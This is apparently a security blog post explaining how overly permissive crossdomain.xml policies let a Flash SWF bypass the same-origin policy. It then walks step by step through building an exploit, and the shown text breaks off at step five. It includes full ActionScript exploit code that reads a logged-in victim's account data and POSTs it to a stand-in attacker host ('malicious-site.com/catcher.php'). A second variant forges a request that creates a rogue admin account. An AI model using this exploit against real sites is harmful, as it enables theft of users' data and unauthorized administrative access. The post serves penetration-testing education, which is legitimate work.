<b>2011:</b> Teams from <a href="http://www.ics.forth.gr/_publications/crossdomainxml_eurosec11.pdf">FORTH-ICS</a>, <a href="https://owasp.org/images/7/78/05A_Client-Side_Cross-Domain_Requests_-_Sebastian_Lekies%2BWalter_Tighzert.pdf">SAP</a> <a href="http://w2spconf.com/2011/papers/cross_domain_Nation.pdf">Research</a>, and <a href="http://cseweb.ucsd.edu/~hovav/dist/crossdomain.pdf">UC San Diego</a> all released research directly related to crossdomain.xml and the security risks that result from misconfiguration.<br />
<br />
While there have been people in the know about this vulnerability since 2006, and some really great research published in 2011, this vulnerability has never really gained much traction. <br />
<br />
Here are some Google search results, as of March 2014:<br />
<br />
<table style="table-layout: fixed; width: 374px;"><colgroup><col style="width: 247px;"></col><col style="width: 127px;"></col></colgroup><tbody>
<tr><th style="background-color: #3498db; border: 0px solid rgb(153, 153, 153); color: white; font-family: Arial, sans-serif; font-weight: normal; overflow: hidden; padding: 10px 5px; word-break: normal;">Search Term</th><th style="background-color: #3498db; border: 0px solid rgb(153, 153, 153); color: white; font-family: Arial, sans-serif; font-weight: normal; overflow: hidden; padding: 10px 5px; word-break: normal;">Result</th></tr>
<tr><td style="background-color: #f7fdfa; border: 0px solid rgb(153, 153, 153); color: #444444; font-family: Arial, sans-serif; overflow: hidden; padding: 10px 5px; word-break: normal;">“crossdomain.xml exploit”</td><td style="background-color: #f7fdfa; border: 0px solid rgb(153, 153, 153); color: #444444; font-family: Arial, sans-serif; overflow: hidden; padding: 10px 5px; word-break: normal;">34 unique hits</td></tr>
<tr><td style="background-color: #f7fdfa; border: 0px solid rgb(153, 153, 153); color: #444444; font-family: Arial, sans-serif; overflow: hidden; padding: 10px 5px; word-break: normal;">“crossdomain.xml attack”</td><td style="background-color: #f7fdfa; border: 0px solid rgb(153, 153, 153); color: #444444; font-family: Arial, sans-serif; overflow: hidden; padding: 10px 5px; word-break: normal;">26 unique hits</td></tr>
<tr><td style="background-color: #f7fdfa; border: 0px solid rgb(153, 153, 153); color: #444444; font-family: Arial, sans-serif; overflow: hidden; padding: 10px 5px; word-break: normal;">“crossdomain.xml vulnerability”</td><td style="background-color: #f7fdfa; border: 0px solid rgb(153, 153, 153); color: #444444; font-family: Arial, sans-serif; overflow: hidden; padding: 10px 5px; word-break: normal;">18 unique hits</td></tr>
</tbody></table>
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;">Six months ago, I ran across my first extremely permissive crossdomain.xml file, but I was left with two questions:</span>
<br />
<ul>
<li><span style="font-family: inherit;">How do I determine if there is really any risk to this particular web application? </span></li>
<li><span style="font-family: inherit;">If there is risk, how can I demonstrate this with a working exploit? </span></li>
</ul>
<span style="font-family: inherit;"></span><br />
<div>
<span style="font-family: inherit;">The answer to the first question can be found in the articles and papers that I linked to above. The answer to the second question, however, was not very accessible until recently. </span><br />
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;">In August 2013, Gursev Kalra released an </span><a href="http://gursevkalra.blogspot.com/2013/08/bypassing-same-origin-policy-with-flash.html" style="font-family: inherit;">excellent blog post</a><span style="font-family: inherit;"> and uploaded his sample ActionScript exploit code to </span><a href="https://github.com/gursev/flash-xdomain-xploit" style="font-family: inherit;">GitHub</a>.<span style="font-family: inherit;"> </span><span style="font-family: inherit;">Thanks to Gursev, I finally had the information I needed to be able to put all the pieces together and exploit this vulnerability.</span></div>
<div>
<br /></div>
<h2>
<span style="font-size: large;">
The Vulnerability</span></h2>
<div>
As a general rule, if the following three conditions are met, there is problem:</div>
<div>
<ol>
<li>A crossdomain.xml file is hosted at the root of the host, for example: <span style="color: blue;">www.secret-site.com/crossdomain.xml.</span></li>
<li>The crossdomain.xml is overly permissive.</li>
<li>There is either sensitive information on<span style="color: blue;"> www.secret-site.com</span> or there are sensitive actions that can be performed on <span style="color: blue;">www.secret-site.com.</span></li>
</ol>
<br />
If #1 and #2 are met, but <span style="color: blue;">www.secret-site.com</span> does not contain any sensitive information, or does not include the ability to perform any sensitive actions, there is no risk to having a wide open crossdomain.xml file. There is no point in making a victim make a request to a page for you if the information is all public and you can see everything anyway.<br />
<br />
However, if there are sensitive actions that can be performed or information that can be stolen, and <span style="color: blue;">www.secret-site.com</span> has an overly permissive crossdomain.xml file, the application at <span style="color: blue;">www.secret-site.com</span> is essentially opening the door to any malicious SWF loaded from anywhere on the web. For example, a SWF loaded from <span style="color: red;">www.malicious-site.com</span> is now able to override/bypass Same Origin Policy and gain access to everything that the authorized user of <span style="color: blue;">www.secret-site.com</span> has access to. To say this in a different way, the overly permissive crossdomain.xml file allows Flash to do things that even JavaScript is not allowed to do, mainly accessing cross domain resources.</div>
<div>
<br />
<i>Note: The most permissive configuration option is the following line: <b><allow-access-from domain="*"></b>. That is not the only overly permissive setting. Check out the reference papers listed above to find more.</i><br />
<br />
<i>Note: </i><i>API sites that require a pre-shared key are </i><i>an exception to the conditions listed above. In this case, even when all three conditions are met, if www.secret-site.com requires an API key or something similar to access the content, there is no risk. The attacker has no way of knowing the pre-shared secret API key, and therefore they can not forge a request with all of the required information to exploit the permissive crossdomain.xml.</i><br />
<i><br /></i>
<i>Note: In my examples, I use <span style="background-color: yellow;">www</span> as the hostname (<span style="color: blue;"><span style="background-color: yellow;">www</span>.secret-site.com</span>). The security implications of the crossdomain.xml are specific to the fully qualified domain name, including hostname and/or subdomain if they are present. For example, if the <span style="color: blue;">https://<span style="background-color: yellow;">www</span>.secret-site.com/crossdomain.xml</span> contains </i><b style="font-style: italic;"><allow-access-from domain="*"></b><i>, but all of the sensitive transactions happen on </i><span style="color: blue; font-style: italic;">https://<span style="background-color: yellow;">secure</span>.secret-site.com</span><i>, there is no risk. Of course,</i> if <span style="color: blue; font-style: italic;">https://<span style="background-color: yellow;">secure</span>.secret-site.com/crossdomain.xml</span><i> exists and it also has an overly permissive policy, then we are back in business. </i><br />
<i><br /></i></div>
<div>
<h2>
<span style="font-size: large;">
Exploitation</span></h2>
<div>
<span style="color: red;">*****</span><br />
<span style="color: red;"><b>Update: If you don't want to follow the step by step below, I have automated it. </b></span><br />
<b>Check it out here: <a href="https://github.com/sethsec/crossdomain-exploitation-framework">https://github.com/sethsec/crossdomain-exploitation-framework</a></b><br />
<b>Demo here: <a href="https://www.youtube.com/watch?v=v5DIcAtnKRU#t=23m59s">https://www.youtube.com/watch?v=v5DIcAtnKRU#t=23m59s</a></b><br />
<br />
At first I made a bash script that just automated what you see below, but after that I switched it to python and now you don't even need to set up apache or anything like that. The python script will set everything up, help you configure your payload, and start a simple, custom, web server for you:<br />
<span style="color: red;">*****</span><br />
<br /></div>
And now the fun part. For the demo, I’m using Kali Linux. If you want to take advantage of the vulnerability described above, you need to modify and compile a SWF and host it on a web server. The steps below show you how to do that, from start to finish. <br />
<br />
1) Install Adobe Flex:<br />
<!-- HTML generated using hilite.me --><br />
<div style="background: #f8f8f8; border-width: .1em .1em .1em .8em; border: solid gray; overflow: auto; padding: .2em .8em; width: auto;">
<pre style="line-height: 125%; margin: 0;"> apt-get install openjdk-6-jdk
mkdir /opt/flex
<span style="color: #aa22ff;">cd</span> /opt/flex/
wget http://download.macromedia.com/pub/flex/sdk/flex_sdk_4.6.zip
unzip flex_sdk_4.6.zip
chmod -R a+rx /opt/flex/
<span style="color: #aa22ff;">echo</span> <span style="color: #bb4444;">'export PATH=/opt/flex/bin:$PATH'</span> >> ~/.bashrc
chmod 755 bin/mxmlc
</pre>
</div>
<br />
2) Download Gursev’s exploit code (the .as and the .html files) from <a href="https://github.com/gursev/flash-xdomain-xploit">GitHub</a> or copy/paste from his <a href="http://gursevkalra.blogspot.com/2013/08/bypassing-same-origin-policy-with-flash.html">blog</a>. In either case, you want to save the HTML into the web root (/var/www/crossdomain/xdx.html), and the AS file in a working folder outside of your web root (~/crossdomain/XDomainXploit.as) <br />
<br />
<!-- HTML generated using hilite.me --><br />
<div style="background: #f8f8f8; border-width: .1em .1em .1em .8em; border: solid gray; overflow: auto; padding: .2em .8em; width: auto;">
<pre style="line-height: 125%; margin: 0;"> mkdir /var/www/crossdomain
mkdir ~/crossdomain
<span style="color: #aa22ff;">cd</span> ~
git clone https://github.com/gursev/flash-xdomain-xploit.git
cp flash-xdomain-xploit/xdx.html /var/www/crossdomain/
cp flash-xdomain-xploit/XDomainXploit.as ~/crossdomain/
vi ~/crossdomain/XDomainXploit.as
</pre>
</div>
<br />
If for some reason you don't have the git client or the git command in the previous box doesn't work, you can use wget:<br />
<!-- HTML generated using hilite.me --><br />
<div style="background: #f8f8f8; border-width: .1em .1em .1em .8em; border: solid gray; overflow: auto; padding: .2em .8em; width: auto;">
<pre style="line-height: 125%; margin: 0;"> <span style="color: #aa22ff;">cd</span> /var/www/crossdomain
wget https://raw.github.com/gursev/flash-xdomain-xploit/master/xdx.html
<span style="color: #aa22ff;">cd</span> ~/crossdomain
wget https://raw.github.com/gursev/flash-xdomain-xploit/master/XDomainXploit.as
vi ~/crossdomain/XDomainXploit.as
</pre>
</div>
<br />
3) Modify the ActionScript file to fit your needs. To make a basic GET request, Gursev's comments are self explanatory. You just replace the victim URL and the attacker URL. <span style="background-color: yellow;">My changes are highlighted in yellow</span>.<br />
<br />
<div style="background-position: initial initial; background-repeat: initial initial; border: solid gray; overflow: auto; padding: 0.2em 0.8em; width: auto;">
<pre style="line-height: 125%; margin: 0px;"><span style="background-color: #f8f8f8; color: #008800; font-style: italic;">// POC Author: Gursev Singh Kalra (gursev.kalra@foundstone.com)</span><span style="background-color: #f8f8f8;">
</span><span style="background-color: #f8f8f8; color: #008800; font-style: italic;">// XDomainXploit.as</span><span style="background-color: #f8f8f8;">
</span><span style="background-color: #f8f8f8; color: #aa22ff; font-weight: bold;">package</span><span style="background-color: #f8f8f8;"> {
</span><span style="background-color: #f8f8f8; color: #aa22ff; font-weight: bold;">import</span><span style="background-color: #f8f8f8;"> flash.display.</span><span style="background-color: #f8f8f8; color: #aa22ff;">Sprite</span><span style="background-color: #f8f8f8; color: #666666;">;</span><span style="background-color: #f8f8f8;">
</span><span style="background-color: #f8f8f8; color: #aa22ff; font-weight: bold;">import</span><span style="background-color: #f8f8f8;"> flash.events.</span><span style="background-color: #f8f8f8; color: #666666;">*;</span><span style="background-color: #f8f8f8;">
</span><span style="background-color: #f8f8f8; color: #aa22ff; font-weight: bold;">import</span><span style="background-color: #f8f8f8;"> flash.net.</span><span style="background-color: #f8f8f8; color: #aa22ff;">URLRequestMethod</span><span style="background-color: #f8f8f8; color: #666666;">;</span><span style="background-color: #f8f8f8;">
</span><span style="background-color: #f8f8f8; color: #aa22ff; font-weight: bold;">import</span><span style="background-color: #f8f8f8;"> flash.net.</span><span style="background-color: #f8f8f8; color: #aa22ff;">URLRequest</span><span style="background-color: #f8f8f8; color: #666666;">;</span><span style="background-color: #f8f8f8;">
</span><span style="background-color: #f8f8f8; color: #aa22ff; font-weight: bold;">import</span><span style="background-color: #f8f8f8;"> flash.net.</span><span style="background-color: #f8f8f8; color: #aa22ff;">URLLoader</span><span style="background-color: #f8f8f8; color: #666666;">;</span><span style="background-color: #f8f8f8;">
</span><span style="background-color: #f8f8f8; color: #aa22ff; font-weight: bold;">public</span><span style="background-color: #f8f8f8;"> </span><span style="background-color: #f8f8f8; color: #aa22ff; font-weight: bold;">class</span><span style="background-color: #f8f8f8;"> XDomainXploit </span><span style="background-color: #f8f8f8; color: #aa22ff; font-weight: bold;">extends</span><span style="background-color: #f8f8f8;"> </span><span style="background-color: #f8f8f8; color: #aa22ff;">Sprite</span><span style="background-color: #f8f8f8;"> {
</span><span style="background-color: #f8f8f8; color: #aa22ff; font-weight: bold;">public</span><span style="background-color: #f8f8f8;"> </span><span style="background-color: #f8f8f8; color: #aa22ff; font-weight: bold;">function</span><span style="background-color: #f8f8f8;"> XDomainXploit() {
</span><span style="background-color: #f8f8f8; color: #008800; font-style: italic;">// Target URL from where the data is to be retrieved</span><span style="background-color: #f8f8f8;">
</span><span style="background-color: #f8f8f8; color: #aa22ff; font-weight: bold;">var</span><span style="background-color: #f8f8f8;"> readFrom</span><span style="background-color: #f8f8f8; color: #666666;">:</span><span style="background-color: #f8f8f8; color: #aa22ff;">String</span><span style="background-color: #f8f8f8;"> </span><span style="background-color: #f8f8f8; color: #666666;">=</span><span style="background-color: #f8f8f8;"> </span><span style="color: #bb4444;"><span style="background-color: #f8f8f8;">"</span><span style="background-color: yellow;">http://www.secret-site.com/account/info</span><span style="background-color: #f8f8f8;">"</span></span><span style="background-color: #f8f8f8; color: #666666;">;</span><span style="background-color: #f8f8f8;">
</span><span style="background-color: #f8f8f8; color: #aa22ff; font-weight: bold;">var</span><span style="background-color: #f8f8f8;"> readRequest</span><span style="background-color: #f8f8f8; color: #666666;">:</span><span style="background-color: #f8f8f8; color: #aa22ff;">URLRequest</span><span style="background-color: #f8f8f8;"> </span><span style="background-color: #f8f8f8; color: #666666;">=</span><span style="background-color: #f8f8f8;"> </span><span style="background-color: #f8f8f8; color: #aa22ff; font-weight: bold;">new</span><span style="background-color: #f8f8f8;"> </span><span style="background-color: #f8f8f8; color: #aa22ff;">URLRequest</span><span style="background-color: #f8f8f8;">(readFrom);
</span><span style="background-color: #f8f8f8; color: #aa22ff; font-weight: bold;">var</span><span style="background-color: #f8f8f8;"> getLoader</span><span style="background-color: #f8f8f8; color: #666666;">:</span><span style="background-color: #f8f8f8; color: #aa22ff;">URLLoader</span><span style="background-color: #f8f8f8;"> </span><span style="background-color: #f8f8f8; color: #666666;">=</span><span style="background-color: #f8f8f8;"> </span><span style="background-color: #f8f8f8; color: #aa22ff; font-weight: bold;">new</span><span style="background-color: #f8f8f8;"> </span><span style="background-color: #f8f8f8; color: #aa22ff;">URLLoader</span><span style="background-color: #f8f8f8;">();
getLoader.addEventListener(</span><span style="background-color: #f8f8f8; color: #aa22ff;">Event</span><span style="background-color: #f8f8f8;">.COMPLETE</span><span style="background-color: #f8f8f8; color: #666666;">,</span><span style="background-color: #f8f8f8;"> eventHandler);
</span><span style="background-color: #f8f8f8; color: #aa22ff; font-weight: bold;">try</span><span style="background-color: #f8f8f8;"> {
getLoader.load(readRequest);
} </span><span style="background-color: #f8f8f8; color: #aa22ff; font-weight: bold;">catch</span><span style="background-color: #f8f8f8;"> (error</span><span style="background-color: #f8f8f8; color: #666666;">:</span><span style="background-color: #f8f8f8; color: #aa22ff;">Error</span><span style="background-color: #f8f8f8;">) {
</span><span style="background-color: #f8f8f8; color: #00a000;">trace</span><span style="background-color: #f8f8f8;">(</span><span style="background-color: #f8f8f8; color: #bb4444;">"Error loading URL: "</span><span style="background-color: #f8f8f8;"> </span><span style="background-color: #f8f8f8; color: #666666;">+</span><span style="background-color: #f8f8f8;"> error);
}
}
</span><span style="background-color: #f8f8f8; color: #aa22ff; font-weight: bold;">private</span><span style="background-color: #f8f8f8;"> </span><span style="background-color: #f8f8f8; color: #aa22ff; font-weight: bold;">function</span><span style="background-color: #f8f8f8;"> eventHandler(event</span><span style="background-color: #f8f8f8; color: #666666;">:</span><span style="background-color: #f8f8f8; color: #aa22ff;">Event</span><span style="background-color: #f8f8f8;">)</span><span style="background-color: #f8f8f8; color: #666666;">:</span><span style="background-color: #f8f8f8;">void {
</span><span style="background-color: #f8f8f8; color: #008800; font-style: italic;">// URL to which retrieved data is to be sent</span><span style="background-color: #f8f8f8;">
</span><span style="background-color: #f8f8f8; color: #aa22ff; font-weight: bold;">var</span><span style="background-color: #f8f8f8;"> sendTo</span><span style="background-color: #f8f8f8; color: #666666;">:</span><span style="background-color: #f8f8f8; color: #aa22ff;">String</span><span style="background-color: #f8f8f8;"> </span><span style="background-color: #f8f8f8; color: #666666;">=</span><span style="background-color: #f8f8f8;"> </span><span style="background-color: #f8f8f8; color: #bb4444;">"</span><span style="background-color: yellow; color: #bb4444;">http://malicious-site.com/catcher.php</span><span style="background-color: #f8f8f8; color: #bb4444;">"</span><span style="background-color: #f8f8f8;">
</span><span style="background-color: #f8f8f8; color: #aa22ff; font-weight: bold;">var</span><span style="background-color: #f8f8f8;"> sendRequest</span><span style="background-color: #f8f8f8; color: #666666;">:</span><span style="background-color: #f8f8f8; color: #aa22ff;">URLRequest</span><span style="background-color: #f8f8f8;"> </span><span style="background-color: #f8f8f8; color: #666666;">=</span><span style="background-color: #f8f8f8;"> </span><span style="background-color: #f8f8f8; color: #aa22ff; font-weight: bold;">new</span><span style="background-color: #f8f8f8;"> </span><span style="background-color: #f8f8f8; color: #aa22ff;">URLRequest</span><span style="background-color: #f8f8f8;">(sendTo);
sendRequest.method </span><span style="background-color: #f8f8f8; color: #666666;">=</span><span style="background-color: #f8f8f8;"> </span><span style="background-color: #f8f8f8; color: #aa22ff;">URLRequestMethod</span><span style="background-color: #f8f8f8;">.POST</span><span style="background-color: #f8f8f8; color: #666666;">;</span><span style="background-color: #f8f8f8;">
sendRequest.data </span><span style="background-color: #f8f8f8; color: #666666;">=</span><span style="background-color: #f8f8f8;"> event.target.data</span><span style="background-color: #f8f8f8; color: #666666;">;</span><span style="background-color: #f8f8f8;">
</span><span style="background-color: #f8f8f8; color: #aa22ff; font-weight: bold;">var</span><span style="background-color: #f8f8f8;"> sendLoader</span><span style="background-color: #f8f8f8; color: #666666;">:</span><span style="background-color: #f8f8f8; color: #aa22ff;">URLLoader</span><span style="background-color: #f8f8f8;"> </span><span style="background-color: #f8f8f8; color: #666666;">=</span><span style="background-color: #f8f8f8;"> </span><span style="background-color: #f8f8f8; color: #aa22ff; font-weight: bold;">new</span><span style="background-color: #f8f8f8;"> </span><span style="background-color: #f8f8f8; color: #aa22ff;">URLLoader</span><span style="background-color: #f8f8f8;">();
</span><span style="background-color: #f8f8f8; color: #aa22ff; font-weight: bold;">try</span><span style="background-color: #f8f8f8;"> {
sendLoader.load(sendRequest);
} </span><span style="background-color: #f8f8f8; color: #aa22ff; font-weight: bold;">catch</span><span style="background-color: #f8f8f8;"> (error</span><span style="background-color: #f8f8f8; color: #666666;">:</span><span style="background-color: #f8f8f8; color: #aa22ff;">Error</span><span style="background-color: #f8f8f8;">) {
</span><span style="background-color: #f8f8f8; color: #00a000;">trace</span><span style="background-color: #f8f8f8;">(</span><span style="background-color: #f8f8f8; color: #bb4444;">"Error loading URL: "</span><span style="background-color: #f8f8f8;"> </span><span style="background-color: #f8f8f8; color: #666666;">+</span><span style="background-color: #f8f8f8;"> error);
}
}
}
}
</span></pre>
</div>
<br />
If you want to have the SWF make a POST request, of if you need to set a HTTP header, you can use my example below:<br />
<br />
<div style="background-position: initial initial; background-repeat: initial initial; border: solid gray; overflow: auto; padding: 0.2em 0.8em; width: auto;">
<pre style="line-height: 125%; margin: 0px;"><span style="background-color: #f8f8f8; color: #008800; font-style: italic;">// POC Author: Gursev Singh Kalra (gursev.kalra@foundstone.com)</span><span style="background-color: #f8f8f8;">
</span><span style="background-color: #f8f8f8; color: #008800; font-style: italic;">// POC Modified to send POSTs and append HTTP headers: Seth Art</span><span style="background-color: #f8f8f8;">
</span><span style="background-color: #f8f8f8; color: #008800; font-style: italic;">// XDomainXploit.as</span><span style="background-color: #f8f8f8;">
</span><span style="background-color: #f8f8f8; color: #aa22ff; font-weight: bold;">package</span><span style="background-color: #f8f8f8;"> {
</span><span style="background-color: #f8f8f8; color: #aa22ff; font-weight: bold;">import</span><span style="background-color: #f8f8f8;"> flash.display.</span><span style="background-color: #f8f8f8; color: #aa22ff;">Sprite</span><span style="background-color: #f8f8f8; color: #666666;">;</span><span style="background-color: #f8f8f8;">
</span><span style="background-color: #f8f8f8; color: #aa22ff; font-weight: bold;">import</span><span style="background-color: #f8f8f8;"> flash.events.</span><span style="background-color: #f8f8f8; color: #666666;">*;</span><span style="background-color: #f8f8f8;">
</span><span style="background-color: #f8f8f8; color: #aa22ff; font-weight: bold;">import</span><span style="background-color: #f8f8f8;"> flash.net.</span><span style="background-color: #f8f8f8; color: #aa22ff;">URLRequestMethod</span><span style="background-color: #f8f8f8; color: #666666;">;</span><span style="background-color: #f8f8f8;">
</span><span style="background-color: #f8f8f8; color: #aa22ff; font-weight: bold;">import</span><span style="background-color: #f8f8f8;"> flash.net.</span><span style="background-color: #f8f8f8; color: #aa22ff;">URLRequest</span><span style="background-color: #f8f8f8; color: #666666;">;</span><span style="background-color: #f8f8f8;">
</span><span style="background-color: #f8f8f8; color: #aa22ff; font-weight: bold;">import</span><span style="background-color: #f8f8f8;"> flash.net.</span><span style="background-color: #f8f8f8; color: #aa22ff;">URLLoader</span><span style="background-color: #f8f8f8; color: #666666;">;</span><span style="background-color: #f8f8f8;">
</span><span style="background-color: yellow;"><span style="color: #aa22ff; font-weight: bold;">import</span> flash.net.<span style="color: #aa22ff;">URLRequestHeader</span><span style="color: #666666;">;</span></span><span style="background-color: #f8f8f8;">
</span><span style="background-color: #f8f8f8; color: #aa22ff; font-weight: bold;">public</span><span style="background-color: #f8f8f8;"> </span><span style="background-color: #f8f8f8; color: #aa22ff; font-weight: bold;">class</span><span style="background-color: #f8f8f8;"> XDomainXploit3 </span><span style="background-color: #f8f8f8; color: #aa22ff; font-weight: bold;">extends</span><span style="background-color: #f8f8f8;"> </span><span style="background-color: #f8f8f8; color: #aa22ff;">Sprite</span><span style="background-color: #f8f8f8;"> {
</span><span style="background-color: #f8f8f8; color: #aa22ff; font-weight: bold;">public</span><span style="background-color: #f8f8f8;"> </span><span style="background-color: #f8f8f8; color: #aa22ff; font-weight: bold;">function</span><span style="background-color: #f8f8f8;"> XDomainXploit3() {
</span><span style="background-color: #f8f8f8; color: #008800; font-style: italic;">// Target URL from where the data is to be retrieved</span><span style="background-color: #f8f8f8;">
</span><span style="background-color: #f8f8f8; color: #aa22ff; font-weight: bold;">var</span><span style="background-color: #f8f8f8;"> readFrom</span><span style="background-color: #f8f8f8; color: #666666;">:</span><span style="background-color: #f8f8f8; color: #aa22ff;">String</span><span style="background-color: #f8f8f8;"> </span><span style="background-color: #f8f8f8; color: #666666;">=</span><span style="background-color: #f8f8f8;"> </span><span style="background-color: #f8f8f8; color: #bb4444;">"</span><span style="background-color: yellow; color: #bb4444;">https://www.secret-site.com/admin/add</span><span style="background-color: #f8f8f8; color: #bb4444;">"</span><span style="background-color: #f8f8f8; color: #666666;">;</span><span style="background-color: #f8f8f8;">
</span><span style="background-color: yellow;"><span style="color: #aa22ff; font-weight: bold;">var</span> header<span style="color: #666666;">:</span><span style="color: #aa22ff;">URLRequestHeader</span> <span style="color: #666666;">=</span> <span style="color: #aa22ff; font-weight: bold;">new</span> <span style="color: #aa22ff;">URLRequestHeader</span>(<span style="color: #bb4444;">"Content-Type"</span><span style="color: #666666;">,</span> <span style="color: #bb4444;">"text/plain; charset=UTF-8"</span>);</span><span style="background-color: #f8f8f8;">
</span><span style="background-color: #f8f8f8; color: #aa22ff; font-weight: bold;">var</span><span style="background-color: #f8f8f8;"> readRequest</span><span style="background-color: #f8f8f8; color: #666666;">:</span><span style="background-color: #f8f8f8; color: #aa22ff;">URLRequest</span><span style="background-color: #f8f8f8;"> </span><span style="background-color: #f8f8f8; color: #666666;">=</span><span style="background-color: #f8f8f8;"> </span><span style="background-color: #f8f8f8; color: #aa22ff; font-weight: bold;">new</span><span style="background-color: #f8f8f8;"> </span><span style="background-color: #f8f8f8; color: #aa22ff;">URLRequest</span><span style="background-color: #f8f8f8;">(readFrom);
</span><span style="background-color: yellow;">readRequest.method <span style="color: #666666;">=</span> <span style="color: #aa22ff;">URLRequestMethod</span>.POST
readRequest.data <span style="color: #666666;">=</span> <span style="color: #bb4444;">"{\"name\":\"CSRF-Admin\",\"Group\":\"admin\",\"password\":\"password\",\"confirmPassword\":\"password\"}"</span><span style="color: #666666;">;</span>
readRequest.requestHeaders.push(header);</span><span style="background-color: #f8f8f8;">
</span><span style="background-color: #f8f8f8; color: #aa22ff; font-weight: bold;">var</span><span style="background-color: #f8f8f8;"> getLoader</span><span style="background-color: #f8f8f8; color: #666666;">:</span><span style="background-color: #f8f8f8; color: #aa22ff;">URLLoader</span><span style="background-color: #f8f8f8;"> </span><span style="background-color: #f8f8f8; color: #666666;">=</span><span style="background-color: #f8f8f8;"> </span><span style="background-color: #f8f8f8; color: #aa22ff; font-weight: bold;">new</span><span style="background-color: #f8f8f8;"> </span><span style="background-color: #f8f8f8; color: #aa22ff;">URLLoader</span><span style="background-color: #f8f8f8;">();
getLoader.addEventListener(</span><span style="background-color: #f8f8f8; color: #aa22ff;">Event</span><span style="background-color: #f8f8f8;">.COMPLETE</span><span style="background-color: #f8f8f8; color: #666666;">,</span><span style="background-color: #f8f8f8;"> eventHandler);
</span><span style="background-color: #f8f8f8; color: #aa22ff; font-weight: bold;">try</span><span style="background-color: #f8f8f8;"> {
getLoader.load(readRequest);
} </span><span style="background-color: #f8f8f8; color: #aa22ff; font-weight: bold;">catch</span><span style="background-color: #f8f8f8;"> (error</span><span style="background-color: #f8f8f8; color: #666666;">:</span><span style="background-color: #f8f8f8; color: #aa22ff;">Error</span><span style="background-color: #f8f8f8;">) {
</span><span style="background-color: #f8f8f8; color: #00a000;">trace</span><span style="background-color: #f8f8f8;">(</span><span style="background-color: #f8f8f8; color: #bb4444;">"Error loading URL: "</span><span style="background-color: #f8f8f8;"> </span><span style="background-color: #f8f8f8; color: #666666;">+</span><span style="background-color: #f8f8f8;"> error);
}
}
</span><span style="background-color: #f8f8f8; color: #aa22ff; font-weight: bold;">private</span><span style="background-color: #f8f8f8;"> </span><span style="background-color: #f8f8f8; color: #aa22ff; font-weight: bold;">function</span><span style="background-color: #f8f8f8;"> eventHandler(event</span><span style="background-color: #f8f8f8; color: #666666;">:</span><span style="background-color: #f8f8f8; color: #aa22ff;">Event</span><span style="background-color: #f8f8f8;">)</span><span style="background-color: #f8f8f8; color: #666666;">:</span><span style="background-color: #f8f8f8;">void {
</span><span style="background-color: #f8f8f8; color: #008800; font-style: italic;">// URL to which retrieved data is to be sent</span><span style="background-color: #f8f8f8;">
</span><span style="background-color: #f8f8f8; color: #aa22ff; font-weight: bold;">var</span><span style="background-color: #f8f8f8;"> sendTo</span><span style="background-color: #f8f8f8; color: #666666;">:</span><span style="background-color: #f8f8f8; color: #aa22ff;">String</span><span style="background-color: #f8f8f8;"> </span><span style="background-color: #f8f8f8; color: #666666;">=</span><span style="background-color: #f8f8f8;"> </span><span style="background-color: #f8f8f8; color: #bb4444;">"</span><span style="background-color: yellow; color: #bb4444;">http://www.malicious-site.com/crossdomain/catcher.php</span><span style="background-color: #f8f8f8; color: #bb4444;">"</span><span style="background-color: #f8f8f8;">
</span><span style="background-color: #f8f8f8; color: #aa22ff; font-weight: bold;">var</span><span style="background-color: #f8f8f8;"> sendRequest</span><span style="background-color: #f8f8f8; color: #666666;">:</span><span style="background-color: #f8f8f8; color: #aa22ff;">URLRequest</span><span style="background-color: #f8f8f8;"> </span><span style="background-color: #f8f8f8; color: #666666;">=</span><span style="background-color: #f8f8f8;"> </span><span style="background-color: #f8f8f8; color: #aa22ff; font-weight: bold;">new</span><span style="background-color: #f8f8f8;"> </span><span style="background-color: #f8f8f8; color: #aa22ff;">URLRequest</span><span style="background-color: #f8f8f8;">(sendTo);
sendRequest.method </span><span style="background-color: #f8f8f8; color: #666666;">=</span><span style="background-color: #f8f8f8;"> </span><span style="background-color: #f8f8f8; color: #aa22ff;">URLRequestMethod</span><span style="background-color: #f8f8f8;">.POST</span><span style="background-color: #f8f8f8; color: #666666;">;</span><span style="background-color: #f8f8f8;">
sendRequest.data </span><span style="background-color: #f8f8f8; color: #666666;">=</span><span style="background-color: #f8f8f8;"> event.target.data</span><span style="background-color: #f8f8f8; color: #666666;">;</span><span style="background-color: #f8f8f8;">
</span><span style="background-color: #f8f8f8; color: #aa22ff; font-weight: bold;">var</span><span style="background-color: #f8f8f8;"> sendLoader</span><span style="background-color: #f8f8f8; color: #666666;">:</span><span style="background-color: #f8f8f8; color: #aa22ff;">URLLoader</span><span style="background-color: #f8f8f8;"> </span><span style="background-color: #f8f8f8; color: #666666;">=</span><span style="background-color: #f8f8f8;"> </span><span style="background-color: #f8f8f8; color: #aa22ff; font-weight: bold;">new</span><span style="background-color: #f8f8f8;"> </span><span style="background-color: #f8f8f8; color: #aa22ff;">URLLoader</span><span style="background-color: #f8f8f8;">();
</span><span style="background-color: #f8f8f8; color: #aa22ff; font-weight: bold;">try</span><span style="background-color: #f8f8f8;"> {
sendLoader.load(sendRequest);
} </span><span style="background-color: #f8f8f8; color: #aa22ff; font-weight: bold;">catch</span><span style="background-color: #f8f8f8;"> (error</span><span style="background-color: #f8f8f8; color: #666666;">:</span><span style="background-color: #f8f8f8; color: #aa22ff;">Error</span><span style="background-color: #f8f8f8;">) {
</span><span style="background-color: #f8f8f8; color: #00a000;">trace</span><span style="background-color: #f8f8f8;">(</span><span style="background-color: #f8f8f8; color: #bb4444;">"Error loading URL: "</span><span style="background-color: #f8f8f8;"> </span><span style="background-color: #f8f8f8; color: #666666;">+</span><span style="background-color: #f8f8f8;"> error);
}
}
}
}
</span></pre>
</div>
<br />
4) Compile the ActionScript with xmmlc:<br />
<br /></div>
<div style="background: #f8f8f8; border-width: .1em .1em .1em .8em; border: solid gray; overflow: auto; padding: .2em .8em; width: auto;">
<pre style="line-height: 125%; margin: 0;"> /opt/flex/bin/mxmlc ~/crossdomain/<span style="line-height: 125%;">XDomainXploit.as</span></pre>
</div>
<div style="margin-bottom: 6pt; margin-top: 24pt;">
5) Move the compiled SWF somewhere inside your web root<br />
<div dir="ltr" style="margin-bottom: 0pt; margin-top: 0pt;">
<!-- HTML generated using hilite.me --><br />
<div style="background: #f8f8f8; border-width: .1em .1em .1em .8em; border: solid gray; overflow: auto; padding: .2em .8em; width: auto;">
<pre style="line-height: 125%; margin: 0;">mv ~/crossdomain/XDomainXploit.swf /var/www/crossdomain
</pre>
</div>
